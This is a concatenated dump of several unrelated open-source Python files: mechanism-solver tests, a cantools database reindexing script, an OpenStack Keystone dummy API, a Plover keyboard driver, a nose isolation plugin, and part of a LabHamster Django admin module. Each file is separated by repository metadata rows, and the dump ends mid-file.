t_config, parse_vpoints, example_list,
)
from . import TestBase
class CoreTest(TestBase):
def test_pxy(self):
"""Test for pxy function."""
coord = pxy(Coord(80, 90), 40, -20)
self.assertAlmostEqual(120, coord.x)
self.assertAlmostEqual(70, coord.y)
def test_ppp(self):
"""Test for ppp function."""
coord = ppp(Coord(0, 0), Coord(0, 90), Coord(90, 0))
self.assertAlmostEqual(90, coord.x)
self.assertAlmostEqual(90, coord.y)
def test_plap(self):
"""Test for plap function."""
coord = plap(Coord(0, 0), 50 * sqrt(2), radians(45), Coord(50, 0))
self.assertAlmostEqual(50, coord.x)
self.assertAlmostEqual(50, coord.y)
def test_pllp(self):
"""Test for pllp function."""
c1 = Coord(-30, 0)
c2 = Coord(30, 0)
coord = pllp(c1, 50, 50, c2)
self.assertAlmostEqual(0, coord.x)
self.assertAlmostEqual(40, coord.y)
coord = pllp(c1, 30, 30, c2)
self.assertAlmostEqual(coord.x, 0)
self.assertAlmostEqual(coord.y, 0)
coord = pllp(c1, 90, 30, c2)
self.assertAlmostEqual(60, coord.x)
self.assertAlmostEqual(0, coord.y)
def test_plpp(self):
"""Test for plpp function."""
coord = plpp(Coord(0, 0), sqrt(5), Coord(0, -3), Coord(3 / 2, 0))
self.assertAlmostEqual(2, coord.x)
self.assertAlmostEqual(1, coord.y)
def test_palp(self):
"""Test for palp function."""
coord = palp(Coord(0, 0), radians(15), 20, Coord(60, 10))
self.assertAlmostEqual(42.253221, coord.x, 6)
self.assertAlmostEqual(19.222356, coord.y, 6)
def test_solving(self):
"""Test triangular formula solving.
+ Test for PMKS parser.
+ Test data collecting function.
+ Test expression solving function.
"""
def test_case(name: str):
expr, inputs = example_list(name)
vpoints = parse_vpoints(expr)
exprs = t_config(vpoints, inputs)
result = expr_solving(exprs, vpoints, {pair: 0. for pair in inputs})
return result[-1]
x, y = test_case("Jansen's linkage (Single)")
self.assertAlmostEqual(-43.170055, x, 6)
self.assertAlmostEqual(-91.753226, y, 6)
x, y = test_case("Crank slider (RP joint)")
self.assertAlmostEqual(103.801126, x, 6)
self.assertAlmostEqual(78.393173, y, 6)
x, y = test_case("Parallel Linkage")
self.assertAlmostEqual(200, x, 6)
self.assertAlmostEqual(0, y, 6)
# TODO: New test case for Inverted slider
def test_solving_bfgs(self):
"""Test Sketch Solve kernel."""
expr, _ = example_list("Jansen's linkage (Single)")
system = SolverSystem(parse_vpoints(expr), {(0, 1): 0.})
result = system.solve()
x, y = result[7]
self.assertAlmostEqual(-43.170055, x, 6)
self.assertAlmostEqual(-91.753226, y, 6)
# Test if angle value changed
system.set_inputs({(0, 1): 45.})
result = system.solve()
x, y = result[7]
self.assertAlmostEqual(-24.406394, x, 6)
self.assertAlmostEqual(-91.789596, y, 6)
# Test if link length changed
system.set_data({(0, 1): 16.})
result = system.solve()
x, y = result[7]
self.assertAlmostEqual(-24.117994, x, 6)
self.assertAlmostEqual(-91.198072, y, 6)
| agpl-3.0 | -3,383,056,336,825,432,600 | 33.53211 | 80 | 0.582359 | false | 3.328028 | true | false | false |
bubbleboy14/cantools | cantools/scripts/index.py | 1 | 8655 | """
### Usage: ctindex [--mode=MODE] [--domain=DOMAIN] [--port=PORT] [--skip=SKIP]
### Options:
-h, --help show this help message and exit
-m MODE, --mode=MODE may be: 'refcount' (default - count up all foreignkey
references for sort orders and such); 'index' (assign
each record a sequential integer index); 'urlsafekeys'
(update all key/keylist properties to use urlsafe keys
introduced in ct 0.8); 'cleanup' (delete zero-count
reference counters). Note regarding 'index' mode: it
_must_ happen remotely; it's generally unnecessary
unless you're trying to migrate an unindexed database
away from gae and need an index/key per record; it
should be invoked from _outside_ -- that's right,
outside -- of your project's directory (to avoid
loading up a bunch of google network tools that may be
crappy or cause issues outside of their normal
'dev_appserver' environment)
-d DOMAIN, --domain=DOMAIN
('index' mode only) what's the domain of the target
server? (default: localhost)
-p PORT, --port=PORT ('index' mode only) what's the port of the target
server? (default: 8080)
-s SKIP, --skip=SKIP skip these tables ('index' mode only) - use '|' as
separator, such as 'table1|table2|table3' (default:
none)
-i INDEX, --index=INDEX
start with this index ('index' mode only) (default: 0)
As you can see, this script's behavior changes according to the backend of the target project.
### dez
Run this if your CTRefCount records get messed up for
some reason. It will go through and recount everything
(in the default 'refcount' mode -- the other modes,
'urlsafekeys' and 'cleanup', are for migrating a CT-mediated
database from an older deployment to CT 0.8 or newer).
### gae
Run this in 'index' mode on a database with lots of missing index values.
"""
from getpass import getpass
from optparse import OptionParser
from cantools.util import error, log, batch
from cantools.db import get_schema, get_model, put_multi, delete_multi, unpad_key
from cantools.web import fetch
from cantools import config
if config.web.server == "dez":
from cantools.db import session, func, refresh_counter
try:
input = raw_input # py2/3 compatibility
except NameError:
pass
counts = { "_counters": 0 }
RETRIES = 5
#
# dez
#
def get_keys(kind, reference):
log("acquiring %s (%s) keys"%(kind, reference), 1)
mod = get_model(kind)
q = session.query(getattr(mod, "key"))
qcount = q.count()
log("found %s"%(qcount,), 2)
fname, fkey = reference.split(".")
fmod = get_model(fname)
fprop = getattr(fmod, fkey)
sub = session.query(fprop, func.count("*").label("sub_count")).group_by(fprop).subquery()
q = q.join(sub, mod.key==getattr(sub.c, fkey))
newcount = q.count()
log("filtering out %s untargetted entities"%(qcount - newcount), 2)
qcount = newcount
log("returning %s keys"%(qcount,), 2)
return q.all()
def refmap():
log("compiling back reference map")
rmap = {}
for tname, schema in list(get_schema().items()):
for pname, kinds in list(schema["_kinds"].items()):
reference = "%s.%s"%(tname, pname)
counts[reference] = 0
for kind in [k for k in kinds if k != "*"]: # skip wildcard for now
if kind not in rmap:
rmap[kind] = {}
rmap[kind][reference] = get_keys(kind, reference)
return rmap
def do_batch(chunk, reference):
log("refreshing %s %s keys"%(len(chunk), reference), 1)
i = 0
rc = []
for item in chunk: # item is single-member tuple
rc.append(refresh_counter(item[0], reference))
i += 1
if not i % 100:
log("processed %s"%(i,), 3)
counts[reference] += len(chunk)
counts["_counters"] += len(rc)
log("refreshed %s total"%(counts[reference],), 2)
log("updated %s counters"%(counts["_counters"],), 2)
put_multi(rc)
log("saved", 2)
def refcount():
log("indexing foreignkey references throughout database", important=True)
import model # load schema
for kind, references in list(refmap().items()):
log("processing table: %s"%(kind,), important=True)
for reference, keys in list(references.items()):
batch(keys, do_batch, reference)
tcount = sum(counts.values()) - counts["_counters"]
log("refreshed %s rows and updated %s counters"%(tcount, counts["_counters"]), important=True)
#
# gae
#
def _log_fetch(host, url, port):
res = fetch(host, url, port)
log(res)
return res
def _index_kind(kind, host, port, pw, index):
log("indexing %s"%(kind,), important=True)
retry = 0
while "Error" in _log_fetch(host, "/_db?action=index&pw=%s&kind=%s&index=%s"%(pw, kind, index), port):
log("error indexing %s"%(kind,), important=True)
if retry == RETRIES:
error("tried %s times! sorry."%(retry,))
retry += 1
log("trying again (retry: %s)"%(retry,))
def index(host, port, skips, index):
pw = getpass("what's the admin password? ")
log("indexing db at %s:%s"%(host, port), important=True)
# log(fetch(host, "/_db?action=index&pw=%s"%(pw,), port))
log("acquiring schema")
schema = fetch(host, "/_db?action=schema", port, ctjson=True)
for kind in schema:
if kind in skips:
log("skipping %s"%(kind,), important=True)
else:
_index_kind(kind, host, port, pw, index)
#
# url safety
#
def urlsafe():
log("updating key/keylist properties with urlsafe keys", important=True)
import model
schema = get_schema()
puts = []
for mod in schema:
mods = get_model(mod).query().all()
log("%s (%s)"%(mod, len(mods)), 1)
for m in mods:
if m.polytype != mod:
log("skipping! (%s != %s)"%(m.polytype, mod), 2)
continue
m.key = unpad_key(m.key.urlsafe())
for prop in schema[mod]["_kinds"]:
if schema[mod][prop] == "key":
setattr(m, prop, unpad_key(getattr(m, prop).urlsafe()))
else: # keylist
setattr(m, prop, [unpad_key(k.urlsafe()) for k in getattr(m, prop)])
puts.append(m)
log("saving records")
put_multi(puts)
log("updated %s keys"%(len(puts),), important=True)
if input("want to prune zero-count reference counters? (y/N)").lower().startswith("y"):
cleanup()
def cleanup():
log("cleaning up zero-count reference counters", important=True)
from cantools.db import lookup
ctrz = lookup.CTRefCount.query(lookup.CTRefCount.count == 0).all()
log("deleting %s zero-count reference counters"%(len(ctrz),))
delete_multi(ctrz)
log("all gone!")
def go():
parser = OptionParser("ctindex [--mode=MODE] [--domain=DOMAIN] [--port=PORT] [--skip=SKIP]")
parser.add_option("-m", "--mode", dest="mode", default="refcount",
help="may be: 'refcount' (default - count up all foreignkey references for sort "
"orders and such); 'index' (assign each record a sequential integer index); "
"'urlsafekeys' (update all key/keylist properties to use urlsafe keys "
"introduced in ct 0.8); 'cleanup' (delete zero-count reference counters). "
"Note regarding 'index' mode: it _must_ happen remotely; it's generally "
"unnecessary unless you're trying to migrate an unindexed database away from "
"gae and need an index/key per record; it should be invoked from _outside_ "
"-- that's right, outside -- of your project's directory (to avoid loading "
"up a bunch of google network tools that may be crappy or cause issues outside "
"of their normal 'dev_appserver' environment)")
parser.add_option("-d", "--domain", dest="domain", default="localhost",
help="('index' mode only) what's the domain of the target server? (default: localhost)")
parser.add_option("-p", "--port", dest="port", default="8080",
help="('index' mode only) what's the port of the target server? (default: 8080)")
parser.add_option("-s", "--skip", dest="skip", default="",
help="skip these tables ('index' mode only) - use '|' as separator, such as 'table1|table2|table3' (default: none)")
parser.add_option("-i", "--index", dest="index", default=0,
help="start with this index ('index' mode only) (default: 0)")
options, args = parser.parse_args()
log("mode: %s"%(options.mode,), important=True)
if options.mode == "refcount":
refcount()
elif options.mode == "index":
index(options.domain, int(options.port),
options.skip and options.skip.split("|") or [], options.index)
elif options.mode == "urlsafekeys":
urlsafe()
elif options.mode == "cleanup":
cleanup()
else:
error("unknown mode: %s"%(options.mode,))
log("goodbye")
if __name__ == "__main__":
go() | mit | -251,470,952,256,595,680 | 37.300885 | 118 | 0.645407 | false | 3.305959 | false | false | false |
mpeuster/son-emu | src/emuvim/api/openstack/openstack_dummies/keystone_dummy_api.py | 1 | 16828 | # Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
from flask_restful import Resource
from flask import request, Response
from emuvim.api.openstack.openstack_dummies.base_openstack_dummy import BaseOpenstackDummy
from emuvim.api.openstack.helper import get_host
import logging
import json
LOG = logging.getLogger("api.openstack.keystone")
class KeystoneDummyApi(BaseOpenstackDummy):
def __init__(self, in_ip, in_port):
super(KeystoneDummyApi, self).__init__(in_ip, in_port)
self.api.add_resource(KeystoneListVersions, "/",
resource_class_kwargs={'api': self})
self.api.add_resource(KeystoneShowAPIv2, "/v2.0",
resource_class_kwargs={'api': self})
self.api.add_resource(KeystoneGetToken, "/v2.0/tokens",
resource_class_kwargs={'api': self})
self.api.add_resource(KeystoneShowAPIv3, "/v3.0",
resource_class_kwargs={'api': self})
self.api.add_resource(
KeystoneGetTokenv3, "/v3.0/auth/tokens", resource_class_kwargs={'api': self})
class KeystoneListVersions(Resource):
"""
List all known keystone versions.
Hardcoded for our version!
"""
def __init__(self, api):
self.api = api
def get(self):
"""
List API versions.
:return: Returns the api versions.
:rtype: :class:`flask.response` containing a static json encoded dict.
"""
LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
resp = dict()
resp['versions'] = dict()
version = [{
"id": "v2.0",
"links": [
{
"href": "http://%s:%d/v2.0" % (get_host(request), self.api.port),
"rel": "self"
}
],
"media-types": [
{
"base": "application/json",
"type": "application/vnd.openstack.identity-v2.0+json"
}
],
"status": "stable",
"updated": "2014-04-17T00:00:00Z"
}]
resp['versions']['values'] = version
return Response(json.dumps(resp), status=200,
mimetype='application/json')
class KeystoneShowAPIv2(Resource):
"""
Entrypoint for all openstack clients.
This returns all current entrypoints running on son-emu.
"""
def __init__(self, api):
self.api = api
def get(self):
"""
List API entrypoints.
:return: Returns an openstack style response for all entrypoints.
:rtype: :class:`flask.response`
"""
LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
# neutron_port = self.api.port + 4696
# heat_port = self.api.port + 3004
resp = dict()
resp['version'] = {
"status": "stable",
"media-types": [
{
"base": "application/json",
"type": "application/vnd.openstack.identity-v2.0+json"
}
],
"id": "v2.0",
"links": [
{
"href": "http://%s:%d/v2.0" % (get_host(request), self.api.port),
"rel": "self"
}
]
}
LOG.debug(json.dumps(resp))
return Response(json.dumps(resp), status=200,
mimetype='application/json')
class KeystoneShowAPIv3(Resource):
"""
Entrypoint for all openstack clients.
This returns all current entrypoints running on son-emu.
"""
def __init__(self, api):
self.api = api
def get(self):
"""
List API entrypoints.
:return: Returns an openstack style response for all entrypoints.
:rtype: :class:`flask.response`
"""
LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
# neutron_port = self.api.port + 4696
# heat_port = self.api.port + 3004
resp = dict()
resp['version'] = {
"status": "stable",
"media-types": [
{
"base": "application/json",
"type": "application/vnd.openstack.identity-v3.0+json"
}
],
"id": "v3.0",
"links": [
{
"href": "http://%s:%d/v3.0" % (get_host(request), self.api.port),
"rel": "self"
}
]
}
return Response(json.dumps(resp), status=200,
mimetype='application/json')
class KeystoneGetToken(Resource):
"""
Returns a static keystone token.
We don't do any validation so we don't care.
"""
def __init__(self, api):
self.api = api
def post(self):
"""
List API entrypoints.
This is hardcoded. For a working "authentication" use these ENVVARS:
* OS_AUTH_URL=http://<ip>:<port>/v2.0
* OS_IDENTITY_API_VERSION=2.0
* OS_TENANT_ID=fc394f2ab2df4114bde39905f800dc57
* OS_REGION_NAME=RegionOne
* OS_USERNAME=bla
* OS_PASSWORD=bla
:return: Returns an openstack style response for all entrypoints.
:rtype: :class:`flask.response`
"""
LOG.debug("API CALL: %s POST" % str(self.__class__.__name__))
try:
ret = dict()
req = json.loads(request.data)
ret['access'] = dict()
ret['access']['token'] = dict()
token = ret['access']['token']
token['issued_at'] = "2014-01-30T15:30:58.819Z"
token['expires'] = "2999-01-30T15:30:58.819Z"
token['id'] = req['auth'].get(
'token', {'id': 'fc394f2ab2df4114bde39905f800dc57'}).get('id')
token['tenant'] = dict()
token['tenant']['description'] = None
token['tenant']['enabled'] = True
token['tenant']['id'] = req['auth'].get(
'tenantId', 'fc394f2ab2df4114bde39905f800dc57')
token['tenant']['name'] = "tenantName"
ret['access']['user'] = dict()
user = ret['access']['user']
user['username'] = req.get('username', "username")
user['name'] = "tenantName"
user['roles_links'] = list()
user['id'] = token['tenant'].get(
'id', "fc394f2ab2df4114bde39905f800dc57")
user['roles'] = [{'name': 'Member'}]
ret['access']['region_name'] = "RegionOne"
ret['access']['serviceCatalog'] = [{
"endpoints": [
{
"adminURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
"region": "RegionOne",
"internalURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
"id": "2dad48f09e2a447a9bf852bcd93548ef",
"publicURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id'])
}
],
"endpoints_links": [],
"type": "compute",
"name": "nova"
},
{
"endpoints": [
{
"adminURL": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
"region": "RegionOne",
"internalURL": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
"id": "2dad48f09e2a447a9bf852bcd93543fc",
"publicURL": "http://%s:%s/v2" % (get_host(request), self.api.port)
}
],
"endpoints_links": [],
"type": "identity",
"name": "keystone"
},
{
"endpoints": [
{
"adminURL": "http://%s:%s" % (get_host(request), self.api.port + 4696),
"region": "RegionOne",
"internalURL": "http://%s:%s" % (get_host(request), self.api.port + 4696),
"id": "2dad48f09e2a447a9bf852bcd93548cf",
"publicURL": "http://%s:%s" % (get_host(request), self.api.port + 4696)
}
],
"endpoints_links": [],
"type": "network",
"name": "neutron"
},
{
"endpoints": [
{
"adminURL": "http://%s:%s" % (get_host(request), self.api.port + 4242),
"region": "RegionOne",
"internalURL": "http://%s:%s" % (get_host(request), self.api.port + 4242),
"id": "2dad48f09e2a447a9bf852bcd93548cf",
"publicURL": "http://%s:%s" % (get_host(request), self.api.port + 4242)
}
],
"endpoints_links": [],
"type": "image",
"name": "glance"
},
{
"endpoints": [
{
"adminURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
"region": "RegionOne",
"internalURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
"id": "2dad48f09e2a447a9bf852bcd93548bf",
"publicURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id'])
}
],
"endpoints_links": [],
"type": "orchestration",
"name": "heat"
}
]
ret['access']["metadata"] = {
"is_admin": 0,
"roles": [
"7598ac3c634d4c3da4b9126a5f67ca2b"
]
},
ret['access']['trust'] = {
"id": "394998fa61f14736b1f0c1f322882949",
"trustee_user_id": "269348fdd9374b8885da1418e0730af1",
"trustor_user_id": "3ec3164f750146be97f21559ee4d9c51",
"impersonation": False
}
return Response(json.dumps(ret), status=200,
mimetype='application/json')
except Exception as ex:
logging.exception("Keystone: Get token failed.")
return ex.message, 500
class KeystoneGetTokenv3(Resource):
"""
Returns a static keystone token.
We don't do any validation so we don't care.
"""
def __init__(self, api):
self.api = api
def post(self):
"""
List API entrypoints.
This is hardcoded. For a working "authentication" use these ENVVARS:
* OS_AUTH_URL=http://<ip>:<port>/v3
* OS_IDENTITY_API_VERSION=2.0
* OS_TENANT_ID=fc394f2ab2df4114bde39905f800dc57
* OS_REGION_NAME=RegionOne
* OS_USERNAME=bla
* OS_PASSWORD=bla
:return: Returns an openstack style response for all entrypoints.
:rtype: :class:`flask.response`
"""
LOG.debug("API CALL: %s POST" % str(self.__class__.__name__))
try:
ret = dict()
req = json.loads(request.data)
ret['token'] = dict()
token = ret['token']
token['issued_at'] = "2014-01-30T15:30:58.819Z"
token['expires_at'] = "2999-01-30T15:30:58.819Z"
token['methods'] = ["password"]
token['extras'] = dict()
token['user'] = dict()
user = token['user']
user['id'] = req['auth'].get(
'token', {'id': 'fc394f2ab2df4114bde39905f800dc57'}).get('id')
user['name'] = "tenantName"
user['password_expires_at'] = None
user['domain'] = {"id": "default", "name": "Default"}
token['audit_ids'] = ["ZzZwkUflQfygX7pdYDBCQQ"]
# project
token['project'] = {
"domain": {
"id": "default",
"name": "Default"
},
"id": "8538a3f13f9541b28c2620eb19065e45",
"name": "tenantName"
}
# catalog
token['catalog'] = [{
"endpoints": [
{
"url": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
"region": "RegionOne",
"interface": "public",
"id": "2dad48f09e2a447a9bf852bcd93548ef"
}
],
"id": "2dad48f09e2a447a9bf852bcd93548ef",
"type": "compute",
"name": "nova"
},
{
"endpoints": [
{
"url": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
"region": "RegionOne",
"interface": "public",
"id": "2dad48f09e2a447a9bf852bcd93543fc"
}
],
"id": "2dad48f09e2a447a9bf852bcd93543fc",
"type": "identity",
"name": "keystone"
},
{
"endpoints": [
{
"url": "http://%s:%s" % (get_host(request), self.api.port + 4696),
"region": "RegionOne",
"interface": "public",
"id": "2dad48f09e2a447a9bf852bcd93548cf"
}
],
"id": "2dad48f09e2a447a9bf852bcd93548cf",
"type": "network",
"name": "neutron"
},
{
"endpoints": [
{
"url": "http://%s:%s" % (get_host(request), self.api.port + 4242),
"region": "RegionOne",
"interface": "public",
"id": "2dad48f09e2a447a9bf852bcd93548cf"
}
],
"id": "2dad48f09e2a447a9bf852bcd93548cf",
"type": "image",
"name": "glance"
},
{
"endpoints": [
{
"url": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
"region": "RegionOne",
"interface": "public",
"id": "2dad48f09e2a447a9bf852bcd93548bf"
}
],
"id": "2dad48f09e2a447a9bf852bcd93548bf",
"type": "orchestration",
"name": "heat"
}
]
return Response(json.dumps(ret), status=201,
mimetype='application/json')
except Exception as ex:
logging.exception("Keystone: Get token failed.")
return ex.message, 500
| apache-2.0 | -1,443,519,102,164,560,100 | 35.822757 | 120 | 0.455253 | false | 4 | false | false | false |
arpadpe/plover | plover/machine/keyboard.py | 1 | 4230 | # Copyright (c) 2010 Joshua Harlan Lifton.
# See LICENSE.txt for details.
"For use with a computer keyboard (preferably NKRO) as a steno machine."
from plover.machine.base import StenotypeBase
from plover.oslayer.keyboardcontrol import KeyboardCapture
class Keyboard(StenotypeBase):
"""Standard stenotype interface for a computer keyboard.
This class implements the three methods necessary for a standard
stenotype interface: start_capture, stop_capture, and
add_callback.
"""
KEYS_LAYOUT = KeyboardCapture.SUPPORTED_KEYS_LAYOUT
ACTIONS = StenotypeBase.ACTIONS + ('arpeggiate',)
def __init__(self, params):
"""Monitor the keyboard's events."""
super(Keyboard, self).__init__()
self.arpeggiate = params['arpeggiate']
self._bindings = {}
self._down_keys = set()
self._released_keys = set()
self._keyboard_capture = None
self._last_stroke_key_down_count = 0
self._update_bindings()
def _update_bindings(self):
self._bindings = dict(self.keymap.get_bindings())
for key, mapping in list(self._bindings.items()):
if 'no-op' == mapping:
self._bindings[key] = None
elif 'arpeggiate' == mapping:
if self.arpeggiate:
self._bindings[key] = None
self._arpeggiate_key = key
else:
# Don't suppress arpeggiate key if it's not used.
del self._bindings[key]
def set_mappings(self, mappings):
super(Keyboard, self).set_mappings(mappings)
self._update_bindings()
def start_capture(self):
"""Begin listening for output from the stenotype machine."""
self._released_keys.clear()
self._last_stroke_key_down_count = 0
self._initializing()
try:
self._keyboard_capture = KeyboardCapture()
self._keyboard_capture.key_down = self._key_down
self._keyboard_capture.key_up = self._key_up
self._keyboard_capture.start()
except:
self._error()
raise
self._ready()
def stop_capture(self):
"""Stop listening for output from the stenotype machine."""
if self._keyboard_capture is not None:
self._keyboard_capture.cancel()
self._keyboard_capture = None
self._stopped()
def set_suppression(self, enabled):
suppressed_keys = self._bindings.keys() if enabled else ()
self._keyboard_capture.suppress_keyboard(suppressed_keys)
def suppress_last_stroke(self, send_backspaces):
send_backspaces(self._last_stroke_key_down_count)
def _key_down(self, key):
"""Called when a key is pressed."""
assert key is not None
if key in self._bindings:
self._last_stroke_key_down_count += 1
steno_key = self._bindings.get(key)
if steno_key is not None:
self._down_keys.add(steno_key)
def _key_up(self, key):
"""Called when a key is released."""
assert key is not None
steno_key = self._bindings.get(key)
if steno_key is not None:
# Process the newly released key.
self._released_keys.add(steno_key)
# Remove invalid released keys.
self._released_keys = self._released_keys.intersection(self._down_keys)
# A stroke is complete if all pressed keys have been released.
# If we are in arpeggiate mode then only send stroke when spacebar is pressed.
send_strokes = bool(self._down_keys and
self._down_keys == self._released_keys)
if self.arpeggiate:
send_strokes &= key == self._arpeggiate_key
if send_strokes:
steno_keys = list(self._down_keys)
if steno_keys:
self._down_keys.clear()
self._released_keys.clear()
self._notify(steno_keys)
self._last_stroke_key_down_count = 0
@classmethod
def get_option_info(cls):
bool_converter = lambda s: s == 'True'
return {
'arpeggiate': (False, bool_converter),
}
| gpl-2.0 | -4,720,774,508,469,126,000 | 35.153846 | 86 | 0.591253 | false | 3.960674 | false | false | false |
santisiri/popego | envs/ALPHA-POPEGO/lib/python2.5/site-packages/nose-0.10.1-py2.5.egg/nose/plugins/isolate.py | 1 | 3674 | """Use the isolation plugin with --with-isolation or the
NOSE_WITH_ISOLATION environment variable to clean sys.modules after
each test module is loaded and executed.
The isolation module is in effect similar to wrapping the following
functions around the import and execution of each test module::
def setup(module):
module._mods = sys.modules.copy()
def teardown(module):
to_del = [ m for m in sys.modules.keys() if m not in
module._mods ]
for mod in to_del:
del sys.modules[mod]
sys.modules.update(module._mods)
Isolation works only during lazy loading. In normal use, this is only
during discovery of modules within a directory, where the process of
importing, loading tests and running tests from each module is
encapsulated in a single loadTestsFromName call. This plugin
implements loadTestsFromNames to force the same lazy-loading there,
which allows isolation to work in directed mode as well as discovery,
at the cost of some efficiency: lazy-loading names forces full context
setup and teardown to run for each name, defeating the grouping that
is normally used to ensure that context setup and teardown are run the
fewest possible times for a given set of names.
PLEASE NOTE that this plugin should not be used in conjunction with
other plugins that assume that modules once imported will stay
imported; for instance, it may cause very odd results when used with
the coverage plugin.
"""
import logging
import sys
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.isolation')
class IsolationPlugin(Plugin):
"""
Activate the isolation plugin to isolate changes to external
modules to a single test module or package. The isolation plugin
resets the contents of sys.modules after each test module or
package runs to its state before the test. PLEASE NOTE that this
plugin should not be used with the coverage plugin in any other case
where module reloading may produce undesirable side-effects.
"""
score = 10 # I want to be last
name = 'isolation'
def configure(self, options, conf):
Plugin.configure(self, options, conf)
self._mod_stack = []
def beforeContext(self):
"""Copy sys.modules onto my mod stack
"""
mods = sys.modules.copy()
self._mod_stack.append(mods)
def afterContext(self):
"""Pop my mod stack and restore sys.modules to the state
it was in when mod stack was pushed.
"""
mods = self._mod_stack.pop()
to_del = [ m for m in sys.modules.keys() if m not in mods ]
if to_del:
log.debug('removing sys modules entries: %s', to_del)
for mod in to_del:
del sys.modules[mod]
sys.modules.update(mods)
def loadTestsFromNames(self, names, module=None):
"""Create a lazy suite that calls beforeContext and afterContext
around each name. The side-effect of this is that full context
fixtures will be set up and torn down around each test named.
"""
# Fast path for when we don't care
if not names or len(names) == 1:
return
loader = self.loader
plugins = self.conf.plugins
def lazy():
for name in names:
plugins.beforeContext()
yield loader.loadTestsFromName(name, module=module)
plugins.afterContext()
return (loader.suiteClass(lazy), [])
def prepareTestLoader(self, loader):
"""Get handle on test loader so we can use it in loadTestsFromNames.
"""
self.loader = loader
| bsd-3-clause | -7,653,814,076,835,601,000 | 36.489796 | 76 | 0.67828 | false | 4.431846 | true | false | false |
graik/labhamster | labhamster/admin.py | 1 | 12409 | ## Copyright 2016 - 2018 Raik Gruenberg
## This file is part of the LabHamster project (https://github.com/graik/labhamster).
## LabHamster is released under the MIT open source license, which you can find
## along with this project (LICENSE) or at <https://opensource.org/licenses/MIT>.
from __future__ import unicode_literals
from labhamster.models import *
from django.contrib import admin
import django.forms
from django.http import HttpResponse
import django.utils.html as html
import customforms
def export_csv(request, queryset, fields):
"""
Helper method for Admin make_csv action. Exports selected objects as
CSV file.
fields - OrderedDict of name / field pairs, see Product.make_csv for example
"""
import csv
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=orders.csv'
writer = csv.writer(response)
writer.writerow(fields.keys())
for o in queryset:
columns = []
for name,value in fields.items():
try:
columns.append( eval('o.%s'%value) )
except:
columns.append("") ## capture 'None' fields
columns = [ c.encode('utf-8') if type(c) is unicode else c \
for c in columns]
writer.writerow( columns )
return response
class RequestFormAdmin(admin.ModelAdmin):
"""
ModelAdmin that adds a 'request' field to the form generated by the Admin.
This e.g. allows to extract the user ID during the creation of the form.
"""
def get_form(self, request, obj=None, **kwargs):
"""
Assign request variable to form
http://stackoverflow.com/questions/1057252/how-do-i-access-the-request-object-or-any-other-variable-in-a-forms-clean-met
(last answer, much simpler than Django 1.6 version)
"""
form = super(RequestFormAdmin, self).get_form(request, obj=obj, **kwargs)
form.request = request
return form
class GrantAdmin(admin.ModelAdmin):
ordering = ('name',)
admin.site.register(Grant, GrantAdmin)
class CategoryAdmin(admin.ModelAdmin):
ordering = ('name',)
admin.site.register(Category, CategoryAdmin)
class VendorAdmin(admin.ModelAdmin):
fieldsets = ((None, {'fields': (('name',),
('link', 'login', 'password'),)}),
('Contact', {'fields' : (('contact',),
('email','phone'),)})
)
list_display = ('name', 'link', 'login', 'password')
ordering = ('name',)
search_fields = ('name', 'contact')
admin.site.register(Vendor, VendorAdmin)
class ProductAdmin(admin.ModelAdmin):
fieldsets = ((None, {'fields': (('name', 'category'),
('vendor', 'catalog'),
('manufacturer', 'manufacturer_catalog'),
'link',
('status', 'shelflife'),
'comment',
'location')}),)
list_display = ('name', 'show_vendor', 'category', 'show_catalog',
'status')
list_filter = ('status', 'category', 'vendor')
ordering = ('name',)
search_fields = ('name', 'comment', 'catalog', 'location', 'vendor__name',
'manufacturer__name', 'manufacturer_catalog')
save_as = True
actions = ['make_ok',
'make_low',
'make_out',
'make_deprecated',
'make_csv']
## reduce size of Description text field.
formfield_overrides = {
models.TextField: {'widget': django.forms.Textarea(
attrs={'rows': 4,
'cols': 80})},
}
def make_ok(self, request, queryset):
n = queryset.update(status='ok')
self.message_user(request, '%i products were updated' % n)
make_ok.short_description = 'Mark selected entries as in stock'
def make_low(self, request, queryset):
n = queryset.update(status='low')
self.message_user(request, '%i products were updated' % n)
make_low.short_description = 'Mark selected entries as running low'
def make_out(self, request, queryset):
n = queryset.update(status='out')
self.message_user(request, '%i products were updated' % n)
make_out.short_description = 'Mark selected entries as out of stock'
def make_deprecated(self, request, queryset):
n = queryset.update(status='deprecated')
self.message_user(request, '%i products were updated' % n)
make_deprecated.short_description = 'Mark selected entries as deprecated'
def make_csv(self, request, queryset):
from collections import OrderedDict
fields = OrderedDict( [('Name', 'name'),
('Vendor', 'vendor.name'),
('Vendor Catalog','catalog'),
('Manufacturer', 'manufacturer.name'),
('Manufacturer Catalog', 'manufacturer_catalog'),
('Category','category.name'),
('Shelf_life','shelflife'),
('Status','status'),
('Location','location'),
